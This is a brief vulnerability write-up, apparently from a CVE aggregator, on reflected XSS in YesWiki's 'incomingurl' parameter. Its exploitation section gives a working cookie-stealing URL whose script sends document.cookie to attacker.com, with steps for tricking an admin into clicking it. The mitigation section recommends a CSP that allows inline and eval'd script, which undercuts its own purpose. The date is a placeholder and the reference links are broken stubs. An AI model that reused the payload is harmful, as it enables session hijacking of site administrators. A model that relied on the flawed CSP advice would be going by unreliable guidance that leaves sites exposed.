Listen to this Post
How the CVE Works
This vulnerability in YesWiki (< v4.5.4) allows Reflected Cross-Site Scripting (XSS) via the `incomingurl` parameter in the `/PagePrincipale/deletepage` endpoint. When an admin visits a crafted URL containing a malicious script (e.g., "><script>alert(1)</script>), the payload is reflected in the response without proper sanitization. Since the endpoint fails to encode user-supplied input, JavaScript executes in the victim’s browser. Attackers can exploit this to hijack sessions, steal cookies, or deface pages by tricking admins into clicking malicious links.
DailyCVE Form
Platform: YesWiki
Version: <4.5.4
Vulnerability: Reflected XSS
Severity: Medium
Date: 2023-XX-XX
What Undercode Say:
Exploitation
1. Craft malicious URL:
https://yeswiki.net/?PagePrincipale%2Fdeletepage&incomingurl="><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
2. Social-engineer admin to click link.
3. Capture session cookies via attacker-controlled server.
Protection
1. Update to YesWiki ≥ v4.5.4.
2. Sanitize `incomingurl` input:
$clean_url = htmlspecialchars($_GET['incomingurl'], ENT_QUOTES, 'UTF-8');
3. Implement Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'
4. Use HTTP-only cookies:
Set-Cookie: sessionid=xxx; HttpOnly; Secure
Detection
Scan for XSS using tools:
python3 xsstrike.py -u "https://yeswiki.net/?PagePrincipale/deletepage" --params "incomingurl"
Log Analysis
Check server logs for suspicious `incomingurl` patterns:
grep -E 'incomingurl=.[<>]' /var/log/nginx/access.log
Mitigation
Deploy WAF rules to block XSS payloads:
SecRule ARGS:incomingurl "@contains <script>" "id:1001,deny,status:403"
References
- YesWiki Changelog: [bash]
- OWASP XSS Guide: [bash]
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
